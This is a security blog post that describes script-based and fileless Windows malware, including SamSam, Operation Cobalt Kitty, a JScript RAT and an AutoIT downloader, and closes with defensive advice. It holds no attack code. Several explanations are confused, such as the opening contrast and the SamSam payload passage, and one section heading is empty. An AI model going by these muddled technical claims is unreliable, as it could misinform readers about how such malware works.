Learning of the blog
- What is Script-Based Malware?
- Script-based techniques
- Why is it popular?
- What can you do to guard your devices against script-based malware?
Let’s take a look as to why script-based malware has dramatically increased over the past two years.
What is Script-Based Malware?
Cybercriminals often seek ways to have malicious files installed on your computer. But that doesn’t require a fileless attack. Instead, fileless malware is more sneaky in activating tools, software, and applications that are already integrated into your operating system. Then that malware hides inside your system. Script-based malware is often regarded to be in the same category since it does not drop portable executable (PE) files on the disk. Fileless malware piggybacks on legitimate scripts by performing malicious activity while the legitimate programs continue to run. Fileless malware can remain undetected because it’s based on memory, not on file. Antivirus software often works with other malware types, because it detects the traditional footprints of a signature.
Script-based techniques may not be fileless, but they may be challenging to detect. Two examples are cobalt kitty operation and SamSam ransomware. Both are malware attacks, using conventional fileless malware attack techniques. Here is a list of examples of script-based malware that is used to infect Windows OS users:
- SamSam ransomware
SamSam is perceived as semi-fileless. Without the initial script, the payload can not be analyzed while files are being used. That’s because the ransomware payload is decrypted for run-time, making finding a sample of the payload code elusive. The only way a sample can be captured for analysis is to witness the attack while it occurs. SamSam is continually evolving, which makes it difficult to detect and protect against attacks like these. Plus, SamSam requires the involvement of its creator in entering a password. That means it doesn’t automatically spread like other malware. To run, the creator has to enter their payload password or the disk decryption code. This makes it unrivaled in its use for single-purpose, targeted attacks.
- Operation Cobalt Kitty
Operation Cobalt Kitty is an instance of a fileless attack that spent nearly six months using malicious PowerShell to target an Asian corporation. More than 40 PCs and servers were infiltrated via a spear-phishing email.
- JScript Remote Access Trojan (RAT)
It ensures persistence on the target system and then uses an encoded network connection to connect to the attacker. After that, the attacker can perform arbitrary commands on the target machine to have potentially full control of it.
- AutoIT downloader
The AutoIT downloader uses network connection and script functions to download and execute malware, which could be used to infect targeted systems with malware such as ransomware, spyware, etc.
Why is it popular?
What can you do to guard your devices against script-based malware?
The best way to prevent script-based malware infections from your devices is to stop them before they happen. However, legacy antivirus solutions, once relied on, no longer get the job done. Security endpoint solutions are being developed for the next generation and will need to be implemented. These so-called endpoint detections and response solutions are based on continuous, real-time monitoring of phishing emails, incoming and outgoing network traffic, and undesirable tasks in operations such as WMI and PowerShell. These fileless attacks oftentimes rely on human vulnerability, which means analyzing and detecting user and system behavior will be central to security. Critical, individual-level best practices include:
- Being wary of downloading and installing apps.
- Keeping up-to-date with software applications and security patches.
- Watching out for phishing emails.
- Updating browsers.
In this article, we talked about how attackers can use scripts to engage in malicious activities on target Windows machines. These scripts don’t reinvent the wheel but offer attackers flexibility and accessibility. As we saw in our study, these benefits allow the attackers to execute commands and thus possibly have full control over target machines. This may give attackers an incentive to choose this option for these reasons. Infection risk is much lower for organizations with high-end cybersecurity professionals and up-to-date Windows hosts that follow security best practices for secure web browsing. Cyber threats have evolved, and so have we!